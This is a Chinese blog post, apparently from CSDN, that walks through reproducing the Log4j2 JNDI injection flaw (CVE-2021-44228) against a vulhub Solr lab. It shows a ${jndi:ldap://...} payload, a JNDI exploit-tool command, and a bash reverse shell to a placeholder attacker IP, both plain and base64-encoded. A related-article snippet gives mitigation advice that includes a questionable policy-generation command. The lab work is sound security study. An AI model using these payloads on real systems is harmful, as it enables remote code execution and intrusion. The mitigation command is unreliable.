Log4j2注入漏洞(CVE-2021-44228)漏洞复现

最新推荐文章于 2024-04-27 20:41:06 发布
最新推荐文章于 2024-04-27 20:41:06 发布
阅读量1.8k 收藏 5
点赞数 1
分类专栏: 漏洞 文章标签: 安全 log4j web安全 框架
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58596609/article/details/127245485
版权

一 漏洞原理

这个漏洞涉及JNDI,LDAP,RMI,Codebase等,可以看看下面的文章

非常详细的讲解,感兴趣的可以看一下这位师傅的文章(强烈推荐)

(10条消息) Log4j2注入漏洞(CVE-2021-44228)万字深度剖析(一)—开篇与基础知识_程序员Daddy的博客-CSDN博客_log4j 注入

二 漏洞复现

        1.环境搭建

                这里使用的是使用vulhub靶场,出现以下图片即为搭建成功

        2.漏洞检测

                可以结合dnslog测试是否存在漏洞,在dnslog获取一个域名进行测试

                漏洞测试点为:http://ip/solr/admin/cores?action=

                payload:${jndi:ldap://恶意类}

                实在payload中加入查询java版本poc,所以有版本回显

                

                3.反弹shell

                        需要使用工具:

                        https://github.com/Zard-ethan/JNDI-Injection-Exploit-1.0-SNAPSHOT-all

                java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all -C "执行的命令" -A "攻击机ip"

                 bash -i >& /dev/tcp/xx.xx.xx.xx/1340 0>&1(反弹命令需要base64加密)

 bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjfafafajgMy4xMzEuNjYuNjUvMTM0MCAwPiY}|{base64,-d}|{bash,-i}

如下图 

 jdk1.8

nc监听:

种树人1
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
Java 6 将 log4j 升级到 2.3.2 版本,Java 7 将 log4j 升级到 2.12.4 版本,Java 8 或更高版本将 log4j 升级到 2.17.1 版本
log4j-CVE-2021-44228-vulhub复现
ANYOUZHEN的博客
06-03 607
使用kali上的vulhub去打开我们输入在kali当前终端输入docker-compose up -d --build启动靶场但是启动靶场时出现了报错问题,网上搜索解决方法解决方法:给管理权限在kali终端输入:sudo docker-compose up -d 下面可以看到靶场正在启动接着输入 http://127.0.0.1:8983/solr/#/可以看到靶场成功打开Dnslog测试DNSLog Platform //dnslog平台网址我们在kali上第二个窗口打开dnslog平台进行记录,点
[CVE-2021-44228]:log4j2漏洞复现流程详解(vulhub环境)
weixin_45441024的博客
04-23 255
Apache Log4j2是Apache软件基金会下的一个开源的基于java的日志记录工具。该远程代码执行漏洞基于攻击者使用${}关键标识触发JNDI注入漏洞,可以执行任意代码。
Log4J2漏洞CVE-2021-44228)原理_log4j2漏洞原理,2024大厂网络安全面试真题集锦
2401_83977369的博客
04-03 603
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)_log4j漏洞复现
m0_57540655的博客
04-18 983
我第一次复现的时候,直接用了JNDI注入工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar或JNDIExploit-1.4-SNAPSHOT.jar,可以在github上搜一下(后文会介绍),但我写博客的时候考虑到用这种工具感觉像是一键复现漏洞,对漏洞利用的每个步骤好像并不是很明确,所以我们还是先不用这种方法,还是老老实实自己编写一下恶意代码,启动一下恶意的http服务站点和LDAP服务,完整的演示一下过程。接下来,我们在攻击机启动LDAP服务。
vulhub环境)[CVE-2021-44228]:log4j2漏洞复现流程详解
最新发布
m0_62670778的博客
04-27 496
下载对应的jar包。将jar包拷贝到kali虚拟机,或者直接在kali中下载。构造payload:这是一条bash反弹shell。将payload进行base64编码。
vulhubLog4j2CVE-2021-44228漏洞复现
weixin_49422491的博客
09-13 2595
vulhubLog4j2CVE-2021-44228漏洞复现
Log4j2CVE-2021-44228漏洞复现
oiadkt的博客
04-10 467
Log4j2CVE-2021-44228漏洞复现
Log4j2漏洞复现CVE-2021-44228
热门推荐
qq_43798640的博客
12-15 3万+
Apache Log4j是一个基于Java的日志记录组件,通过重写Log4j引入了丰富的功能特性,该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。Apache Log4j2存在远程代码执行漏洞,攻击者可利用该漏洞向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。影响范围:Apache Log4j 2.x<=2.14.1。已知受影响的应用及组件,如 spring-boot-strater-log4...
Apache Log4j2远程代码执行漏洞CVE-2021-44228复现
qq_40640917的博客
01-10 2421
Apache Log4j2 存在远程代码执行漏洞,该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。Apache Log4j2是一个开源的Java日志框架,被广泛地应用在中间件、开发框架Web应用中。攻击机参数:Kali(或安装有msfconsole的任意Linux/Windows操作系统)靶机容器:vulfocus/log4j2-rce-2021-12-09。靶机参数:Centos8.1。
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
Bossfrank的博客
04-14 2万+
本文是log4j2远程代码执行漏洞原理和漏洞复现的详细说明。基于vulhub搭建靶场,攻击者利用log4j2框架下的lookup服务提供的{}字段解析功能,在{}内使用了了JNDI注入的方式,通过RMI或LDAP服务远程加载了攻击者提前部署好的恶意代码(.class),最终造成了远程代码执行。
[CVE-2021-44228]:log4j2漏洞学习与复现流程详解(vulhub环境)
qq_46145027的博客
05-10 3491
刚搭好vulhub,迫不及待的来复现一下2021-2022最潮最in的漏洞log4j2,因为算是热点了面试什么的的感觉都蛮容易被问到的,这里就来整理一下这个漏洞相关信息和漏洞复现的流程。
如何通过vulhub靶场复现log4j2漏洞
weixin_46683781的博客
06-11 2400
准备: 攻击机:kaili 靶机:Mac的vulhub靶场Log4j2默认支持解析ldap/rmi协议,并会通过名称从ldap服务端其获取对应的Class文件,并使用ClassLoader在本地加载Ldap服务端返回的Class类。这就为攻击者提供了攻击途径,攻击者可以在界面传入一个包含恶意内容(会提供一个恶意的Class文件)的ldap协议内容(如:恶意内容${jndi:ldap://localhost:{sys:java.version}}恶意内容),该内容传递到后端被log4j2打印出来,就会触发恶意
LOG4J2(CVE-2021-44228)vulhub复现
kriesa的博客
07-13 1463
LOG4J2(CVE-2021-44228)vulhub复现
apache log4j CVE-2021-44228漏洞怎么解决
06-03
漏洞描述: Apache Log4j 2.x中存在一种命令注入漏洞,攻击者通过构造恶意日志信息,可以在目标服务器上执行任意命令。 解决办法: 1.升级到最新版本 Apache Log4j 2.x发布了修复此漏洞的版本2.17.0,建议用户尽快升级到该版本。 2.使用安全策略文件 在升级之前,可以通过使用安全策略文件来限制日志信息中使用的类和方法,以减少攻击面。可以使用以下命令生成策略文件: ``` java -Dlog4j2.formatMsgNoLookups=true -Dlog4j2.disable.jmx=true -Dlog4j2.benchMillis=100 org.apache.logging.log4j.core.tools.GenerateExtendedLoggerInfo > log4j2-enum-class-loader.policy ``` 然后将策略文件放置在类路径下,例如在Tomcat中,可以将其放置在`$CATALINA_BASE/conf`目录下。 3.禁用Log4j JNDI Lookup功能 如果无法立即升级,可以通过在JVM参数中添加以下选项来禁用Log4j JNDI Lookup功能: ``` -Dlog4j2.formatMsgNoLookups=true ``` 或者在log4j2.xml配置文件中添加以下选项: ``` <Configuration> <properties> <property name="log4j2.formatMsgNoLookups">true</property> </properties> ... </Configuration> ``` 以上是针对Apache Log4j 2.x的解决办法,如果您使用的是其他版本的Log4j,请查看厂商的官方文档或者联系技术支持获取解决办法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

种树人1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值